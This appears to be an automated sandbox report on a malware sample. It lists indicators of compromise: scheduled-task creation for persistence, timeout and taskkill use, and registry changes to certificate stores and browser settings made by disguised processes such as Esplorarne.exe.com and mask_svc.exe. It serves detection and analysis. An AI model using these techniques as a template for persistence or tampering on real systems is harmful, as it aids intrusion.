Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (10 instances)
pid | process
3352 | schtasks.exe
6308 | schtasks.exe
2756 | schtasks.exe
192 | schtasks.exe
5484 | schtasks.exe
4480 | schtasks.exe
5096 | schtasks.exe
5240 | schtasks.exe
6008 | schtasks.exe
7940 | schtasks.exe
-
Delays execution with timeout.exe 3 IoCs
Processes: timeout.exe (3 instances)
pid | process
5724 | timeout.exe
8860 | timeout.exe
5992 | timeout.exe
-
Enumerates system info in registry (2 TTPs, 6 IoCs)
Processes:
description           ioc  process
Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WerFault.exe
Key opened            \REGISTRY\MACHINE\Hardware\Description\System\BIOS  WerFault.exe
Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WerFault.exe
Key opened            \REGISTRY\MACHINE\Hardware\Description\System\BIOS  WerFault.exe
Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WerFault.exe
Key opened            \REGISTRY\MACHINE\Hardware\Description\System\BIOS  WerFault.exe

Kills process with taskkill (7 IoCs)
Processes:
pid   process
3792  taskkill.exe
4076  taskkill.exe
4740  taskkill.exe
4620  taskkill.exe
6360  taskkill.exe
4572  taskkill.exe
5796  taskkill.exe

Modifies Control Panel (2 IoCs)
Processes:
description           ioc  process
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Colors  Esplorarne.exe.com
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Colors  Esplorarne.exe.com

Processes:
description           ioc  process
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\TypedURLs  rundll32.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main  Esplorarne.exe.com
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main  Esplorarne.exe.com
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main  browser_broker.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main  Esplorarne.exe.com
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main  Esplorarne.exe.com
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main  Esplorarne.exe.com
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main  browser_broker.exe

Modifies data under HKEY_USERS (64 IoCs)
Processes:
description           ioc  process
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time"  mask_svc.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs  mask_svc.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs  Esplorarne.exe.com
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"  mask_svc.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs  Esplorarne.exe.com
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time"  mask_svc.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates  mask_svc.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates  mask_svc.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time"  mask_svc.exe
Set value (int)       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  svchost.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time"  mask_svc.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates  mask_svc.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2491 = "Aus Central W. Daylight Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs  Esplorarne.exe.com
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs  Esplorarne.exe.com
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2792 = "Novosibirsk Standard Time"  mask_svc.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed  mask_svc.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Key created           \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache  svchost.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2001 = "Cabo Verde Daylight Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"  mask_svc.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"  9NeY7wDiJGhrvsW_GspXT3lp.exe
Key created           \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust  Esplorarne.exe.com
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2182 = "Astrakhan Standard Time"  mask_svc.exe
Set value (str)       \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time"  mask_svc.exe

Modifies registry class (64 IoCs)
Processes:
description           ioc  process
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"  Esplorarne.exe.com
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"  Esplorarne.exe.com
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU  Esplorarne.exe.com
Set value (str)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"  Esplorarne.exe.com
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main  Esplorarne.exe.com
Set value (data)      \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 3ff00d30e598d701  MicrosoftEdge.exe
Set value (data)      \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000  MicrosoftEdgeCP.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies  Esplorarne.exe.com
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus  Esplorarne.exe.com
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"  MicrosoftEdge.exe
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"  MicrosoftEdge.exe
Set value (str)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"  MicrosoftEdgeCP.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings  WerFault.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete  Esplorarne.exe.com
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead  MicrosoftEdge.exe
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"  MicrosoftEdge.exe
Set value (str)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"  MicrosoftEdgeCP.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root  MicrosoftEdgeCP.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs  MicrosoftEdgeCP.exe
Set value (str)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CachePrefix  Esplorarne.exe.com
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1"  Esplorarne.exe.com
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"  Esplorarne.exe.com
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"  MicrosoftEdgeCP.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry  MicrosoftEdge.exe
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"  MicrosoftEdgeCP.exe
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"  Esplorarne.exe.com
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust\CTLs  MicrosoftEdgeCP.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache  MicrosoftEdgeCP.exe
Key created           \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\650478DC7424C37C  svchost.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser  MicrosoftEdge.exe
Set value (data)      \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000  MicrosoftEdgeCP.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust  MicrosoftEdgeCP.exe
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"  MicrosoftEdge.exe
Set value (str)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""  Esplorarne.exe.com
Set value (data)      \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000  MicrosoftEdgeCP.exe
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CacheLimit = "1"  Esplorarne.exe.com
Set value (data)      \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000  MicrosoftEdgeCP.exe
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"  MicrosoftEdge.exe
